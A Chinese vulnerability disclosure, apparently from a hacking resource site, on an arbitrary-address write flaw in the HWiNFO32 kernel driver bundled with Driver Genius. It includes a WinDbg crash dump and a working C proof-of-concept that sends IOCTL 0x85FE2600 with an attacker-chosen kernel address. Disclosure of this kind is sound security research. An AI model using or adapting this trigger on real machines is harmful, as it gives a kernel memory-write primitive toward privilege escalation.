加入收藏丨  设为首页丨
入侵检测
当前位置:资源啦 > 黑客基地 > 入侵检测

HWiNFO32驱动任意地址写固定数据漏洞

时间:2017-12-29 14:42:04  作者:  来源:  查看:0  评论:0
内容摘要:这个漏洞是在研究驱动精灵的时候发现的,最后确认是其调用的HWiNFO32驱动所产生的问题,而HWiNFO32并非驱动精灵开发的驱动,所以最后写标题时也纠结了一番。废话不说了,开始。HWiNFO32驱动过滤不严,造成任意地址写固定数据漏洞。驱动精灵中包含HWiNFO32,其名称为 Mydriver32.sys,发现很久了...

这个漏洞是在研究驱动精灵的时候发现的,最后确认是其调用的HWiNFO32驱动所产生的问题,而HWiNFO32并非驱动精灵开发的驱动,所以最后写标题时也纠结了一番。废话不说了,开始。

HWiNFO32驱动过滤不严,造成任意地址写固定数据漏洞。驱动精灵中包含HWiNFO32,其名称为 Mydriver32.sys,发现很久了,版本已经不记得了,当时是安装驱动下载的最新版。

详细说下漏洞:在DeviceIoControl例程中,当IoControlCode=0x85FE2600时,不严格过滤用户传入的lpOutBuffer参数,直接调用 nt!IopfCompleteRequest后,经过一系列处理,最终在nt!IopCompleteRequest产生漏洞,可写任意地址。因其最终引发错误的代码发生nt!IopCompleteRequest,所以也与系统相关。经测试 xp sp3可正常利用,Win7则没有影响。

看看 windbg的崩溃信息。

PAGE_FAULT_IN_NONPAGED_AREA (50)Invalid system memory was referenced.  This cannot be protected by try-except,it must be protected by a Probe.    Typically the address is just plain bad or itis pointing at freed memory.Arguments:Arg1: ffff0000, memory referenced.Arg2: 00000001, value 0 = read operation, 1 = write operation.Arg3: 804ed09b, If non-zero, the instruction address which referenced the bad memoryaddress.Arg4: 00000000, (reserved)Debugging Details:------------------WRITE_ADDRESS:FAULTING_IP:ffff0000nt!IopCompleteRequest+92804ed09b f3a5rep movs dword ptr es:[edi],dword ptr [esi]MM_INTERNAL_CODE:DEFAULT_BUCKET_ID:0CODE_CORRUPTIONBUGCHECK_STR:PROCESS_NAME:IRP_ADDRESS:0x50TestMyDriver32_82177f68DEVICE_OBJECT: 81d5f518DRIVER_OBJECT: 81d26288IMAGE_NAME:DgSafe.sysDEBUG_FLR_IMAGE_TIMESTAMP:MODULE_NAME: DgSafe540684f3FAULTING_MODULE: b1250000 mydrivers32TRAP_FRAME:    b137f91c -- (.trap 0xffffffffb137f91c)ErrCode = 00000002eax=00000110 ebx=82177f68 ecx=00000044 edx=00000001 esi=81f24680 edi=ffff0000eip=804ed09b esp=b137f990 ebp=b137f9d4 iopl=0nv up ei pl nz na pe nccs=0008ss=0010ds=0023es=0023fs=0030gs=0000efl=00010206nt!IopCompleteRequest+0x92:804ed09b f3a5rep movs dword ptr es:[edi],dword ptr [esi]from 80533797 to 804e450aResetting default scopeLAST_CONTROL_TRANSFER:STACK_TEXT:b137f46c 80533797 00000003 ffff0000 00000000 nt!RtlpBreakWithStatusInstructionb137f4b8 8053426e 00000003 806f2298 c03fffc0 nt!KiBugCheckDebugBreak+0x19b137f898 8053485e 00000050 ffff0000 00000001 nt!KeBugCheck2+0x574b137f8b8 805251a8 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1bb137f904 804e2747 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5b137f904 804ed09b 00000001 ffff0000 00000000 nt!KiTrap0E+0xccb137f9d4 804ed11a 82177fa8 b137fa20 b137fa14 nt!IopCompleteRequest+0x92b137fa24 806f2c35 00000000 00000000 b137fa3c nt!KiDeliverApc+0xb3b137fa24 806f2861 00000000 00000000 b137fa3c hal!HalpApcInterrupt+0xc5b137faac804e63cc82177fa882177f6800000000hal!KeReleaseInStackQueuedSpinLock+0x11b137facc 804ed134 82177fa8 81d2d588 00000000 nt!KeInsertQueueApc+0x4bb137fb00 b1251f27 81d2d588 81d26288 82177f68 nt!IopfCompleteRequest+0x1d8WARNING: Stack unwind information not available. Following frames may be wrong.b137fc34 804e4767 81d5f518 82177f68 806f22d0 mydrivers32+0x1f27b137fc44 805692ab 82177fd8 81d2d588 82177f68 nt!IopfCallDriver+0x31b137fc58 805781e2 81d5f518 82177f68 81d2d588 nt!IopSynchronousServiceTail+0x70b137fd00 8057a705 00000054 00000000 00000000 nt!IopXxxControlFile+0x611b137fd34 804df7f8 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2ab137fd34 7c92e514 00000054 00000000 00000000 nt!KiSystemServicePostCall0013fed8 7c92d28a 7c801675 00000054 00000000 ntdll!KiFastSystemCallRet0013fedc 7c801675 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc0013ff3c 00401058 00000054 85fe2600 0013ff68 kernel32!DeviceIoControl+0xddFOLLOWUP_NAME:MachineOwnerMEMORY_CORRUPTOR:PATCH_DgSafeFAILURE_BUCKET_ID:MEMORY_CORRUPTION_PATCH_DgSafeBUCKET_ID:MEMORY_CORRUPTION_PATCH_DgSafeFollowup: MachineOwner

代码流程:mydriver32-nt!IopfCompleteRequest-nt!IopCompleteRequest ,在mydrivers32+0x1f27处,当IoControlCode=0x85FE2600时,不对用户传入的OUTBUFF进行任何验证,就直接调用了nt!IopfCompleteRequest,而 IopfCompleteRequest有这样一段代码。

HWiNFO32驱动任意地址写固定数据漏洞

正是这段代码,造成了漏洞。但按调用代码来说,复刻进去的数据应当为POC中的数据,但实际却固定为0x2,不知为何,希望有人能告知。下面是可利用的 POC代码。

VOID TestMyDriver32(){HANDLE   hCreateFile = INVALID_HANDLE_VALUE;DWORD   dwInBuffer = 0x6c77792a;DWORD   dwOutBuffer = 0xf8be8020;//内核可写地址请自行更改hCreateFile = CreateFileA(\\\\.\\HWiNFO32,0,// no access to the driveFILE_SHARE_READ | // share modeFILE_SHARE_WRITE,NULL,// default security attributesOPEN_EXISTING,// disposition0,// file attributesNULL);if (hCreateFile == INVALID_HANDLE_VALUE){printf(Error Open Device!\n);return ;}DeviceIoControl(hCreateFile,0x85FE2600,(LPVOID)dwInBuffer,4,(LPVOID)dwOutBuffer, 0, dwInBuffer, NULL);CloseHandle(hCreateFile);return;}int _tmain(int argc, _TCHAR* argv[]){char cSSS[10];TestMyDriver32();scanf(%s,cSSS);return 0;}

图 1是漏洞触发的结果验证。

HWiNFO32驱动任意地址写固定数据漏洞


© 2017 www.ziyuanla.com 版权所有